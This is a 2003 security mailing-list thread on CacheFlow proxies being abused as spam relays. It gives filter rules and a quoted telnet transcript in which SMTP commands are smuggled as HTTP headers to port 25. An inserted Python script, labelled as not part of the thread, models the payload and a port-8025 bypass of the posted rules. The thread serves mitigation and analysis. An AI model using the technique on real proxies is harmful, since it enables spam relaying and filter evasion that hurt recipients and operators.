
List:       incidents
Subject:    Re: Cacheflow proxy abuse (revisited)
From:       Tim Kennedy <tim () timkennedy ! net>
Date:       2003-09-12 15:19:44


Alain,

If you make sure all 4 of these lines are in your inline filter,
it will block both the GET and POST methods of making outbound 
connections on a cacheflow.
--------------------------------------------------------------------------
        cacheflow#conf t
        cacheflow#(config)inline filter-list local ccc
        https://.*:(443|80) service=yes
        https://.*:[0-9]+/ service=no
        http://.*:(443|80) service=yes
        http://.*:[0-9]+/ service=no
        ccc
--------------------------------------------------------------------------
Sorry, I left the second two (http) lines out, in my original mail.

I left the log of the original telnet session at the bottom of this 
reply.  When I add these lines to the cacheflow, and try to GET or
POST to another server, on another port, I get:

--------------------------------------------------------------------------
memnoch[1075]# telnet 10.0.2.190 80
Trying 10.0.2.190...
Connected to 10.0.2.190.
Escape character is '^]'.
POST / HTTP/1.1
HOST: mail.yellowbrix.com:25
HELO .

HTTP/1.0 403 Forbidden
Cache-Control: no-cache
Pragma: no-cache
Content-Length:  2678
Content-Type: text/html
Connection: close
--------------------------------------------------------------------------

At least, it worked for me, and people have stopped relaying through 
our cacheflow.

-Tim

On Fri, 12 Sep 2003, Alain Fauconnet wrote:

> Hello,
> 
> Thanks for the info. That does prevent the CONNECT abuse, but not the
> POST abuse, which can be used almost in the same way (although a bit
> more difficult) to use a Cacheflow to hide one's tracks when spamming.
> 
> Greets,
> _Alain_
>  
> > --------------------------------------------------------------------------
> > telnet ip.or.hostname.of.cacheflow 80
> > GET / HTTP/1.1
> > HOST: mailserver.victim.com:25
> > HELO .
> > mail from: spammer@alter.net
> > rcpt to: target@unsuspecting.com
> > DATA
> > Subject: Look Ma! I'm an open relay
> > HI, you've been spammed through an open proxy, because of a bug in the
> > OS code.  Have a Great Day!
> > -Spammer
> > .
> > 
> > 220 mailserver.victim.com ESMTP Sendmail 8.12.9/8.12.9; Wed, 10 Sep 2003 11:15:31 -0400
> > 500 5.5.1 Command unrecognized: "GET / HTTP/1.0"
> > 500 5.5.1 Command unrecognized: "HOST: memnoch.sugarat.net:25"
> > 250 mailserver.victim.com Hello CacheFlowServer@[xxx.x.x.xx], pleased to meet you
> > 250 2.1.0 spammer@alter.net... Sender ok
> > 250 2.1.5 target@unsuspecting.com... Recipient ok
> > 354 Enter mail, end with "." on a line by itself
> > 250 2.0.0 h8AFFVfo011729 Message accepted for delivery
> > 500 5.5.1 Command unrecognized: "Cache-Control: max-stale=0"
> > 500 5.5.1 Command unrecognized: "Connection: Keep-Alive"
> > 500 5.5.1 Command unrecognized: "Client-ip: xx.xx.x.xxx"
> > 500 5.5.1 Command unrecognized: ""
> > ^]
> > telnet> close
> > Connection closed.
> > 
> > --------------------------------------------------------------------------
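The following Python script is an added example, not part of this thread or of any CacheFlow code. It models the abuse Tim and Alain describe and the effect of the four filter lines above. The proxy side builds the upstream URL from the Host header and applies the rules as Python re.search patterns, first match wins, with an allow-by-default fallthrough; the thread does not state how CacheFlow anchors patterns or what its default action is, so both are assumptions here. The SMTP side is a toy receiver that answers 500 to any line it does not understand and otherwise carries on, which is exactly why a GET or POST smuggled to port 25 still delivers mail, as the Sendmail transcript shows. It also shows a caveat of the rules as written: under an unanchored search, ":(443|80)" also matches a Host header of "mailserver.victim.com:8025", so an anchored variant is included for comparison. CONNECT is not modelled. Hostnames are the thread's own placeholders; the Client-ip value and the sample message are constructed.

```python
import re

# Model of the four inline-filter lines from the thread, applied as Python
# re.search patterns in order, first match wins.  CacheFlow's real matching
# semantics (anchoring, default action) are not given in the thread; the
# allow-by-default fallthrough below is an assumption of this example.
POSTED_RULES = [
    (r"https://.*:(443|80)", True),   # service=yes
    (r"https://.*:[0-9]+/", False),   # service=no
    (r"http://.*:(443|80)", True),    # service=yes
    (r"http://.*:[0-9]+/", False),    # service=no
]

# Same intent with the port anchored, so ":80" cannot match ":8025".
ANCHORED_RULES = [
    (r"^https?://[^/]*:(443|80)(/|$)", True),
    (r"^https?://[^/]*:[0-9]+(/|$)", False),
]


def filter_decision(url, rules=POSTED_RULES, default=True):
    """True means service=yes (forward), False means service=no (403)."""
    for pattern, allow in rules:
        if re.search(pattern, url):
            return allow
    return default


def forwarded_lines(method, path, host_header, smuggled):
    """What the proxy hands to whatever listens on the host:port from the
    Host header.  The client's extra 'header' lines ride along untouched and
    the proxy appends its own headers plus a blank line, as in the capture.
    The Client-ip value is constructed."""
    return ([f"{method} {path} HTTP/1.0", f"HOST: {host_header}"]
            + list(smuggled)
            + ["Cache-Control: max-stale=0", "Connection: Keep-Alive",
               "Client-ip: 192.0.2.10", ""])


def smtp_responses(lines, server="mailserver.victim.com"):
    """Toy SMTP receiver with Sendmail-like tolerance: an unknown line gets
    a 500 and is otherwise ignored; DATA collects until a lone '.'.
    Returns (responses, accepted_messages)."""
    responses = [f"220 {server} ESMTP"]
    accepted, body, in_data = [], [], False
    for line in lines:
        if in_data:
            if line == ".":
                in_data = False
                accepted.append("\n".join(body))
                responses.append("250 2.0.0 Message accepted for delivery")
            else:
                body.append(line)
            continue
        upper = line.upper()
        verb = upper.split(" ", 1)[0]
        if verb in ("HELO", "EHLO"):
            responses.append(f"250 {server} Hello, pleased to meet you")
        elif upper.startswith("MAIL FROM:"):
            responses.append("250 2.1.0 Sender ok")
        elif upper.startswith("RCPT TO:"):
            responses.append("250 2.1.5 Recipient ok")
        elif verb == "DATA":
            in_data, body = True, []
            responses.append('354 Enter mail, end with "." on a line by itself')
        else:
            responses.append(f'500 5.5.1 Command unrecognized: "{line}"')
    return responses, accepted


# Constructed payload modelled on the thread's capture: SMTP commands sent
# as HTTP header lines, so they reach port 25 before the proxy's own headers.
SMUGGLED_SMTP = [
    "HELO .",
    "mail from: spammer@alter.net",
    "rcpt to: target@unsuspecting.com",
    "DATA",
    "Subject: Look Ma! I'm an open relay",
    "relayed through an open proxy",
    ".",
]


def relay_via_proxy(method, path, host_header, smuggled, rules=POSTED_RULES):
    """Whole chain: the proxy builds http://<Host><path>, applies the filter
    and only on service=yes connects and forwards the raw request.
    Returns (status, accepted_messages, smtp_responses)."""
    url = f"http://{host_header}{path}"
    if not filter_decision(url, rules):
        return "HTTP/1.0 403 Forbidden", [], []
    lines = forwarded_lines(method, path, host_header, smuggled)
    responses, accepted = smtp_responses(lines)
    return "relayed", accepted, responses


if __name__ == "__main__":
    for rules, label in (([], "no filter"), (POSTED_RULES, "posted rules"),
                         (ANCHORED_RULES, "anchored rules")):
        for host in ("mailserver.victim.com:25", "mailserver.victim.com:8025"):
            status, accepted, _ = relay_via_proxy("POST", "/", host, SMUGGLED_SMTP, rules)
            print(f"{label:14} {host:30} {status:22} accepted: {len(accepted)}")
```

Running it prints, per rule set, whether the smuggled message is relayed or met with 403; the posted rules stop port 25 but let port 8025 through under unanchored matching, the anchored variant stops both.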

---------------------------------------------------------------------------
Attend Black Hat Briefings & Training Federal, September 29-30 (Training), 
October 1-2 (Briefings) in Tysons Corner, VA; the world's premier 
technical IT security event.  Modeled after the famous Black Hat event in 
Las Vegas! 6 tracks, 12 training sessions, top speakers and sponsors.  
Symantec is the Diamond sponsor.  Early-bird registration ends September 6. Visit us: www.blackhat.com
----------------------------------------------------------------------------
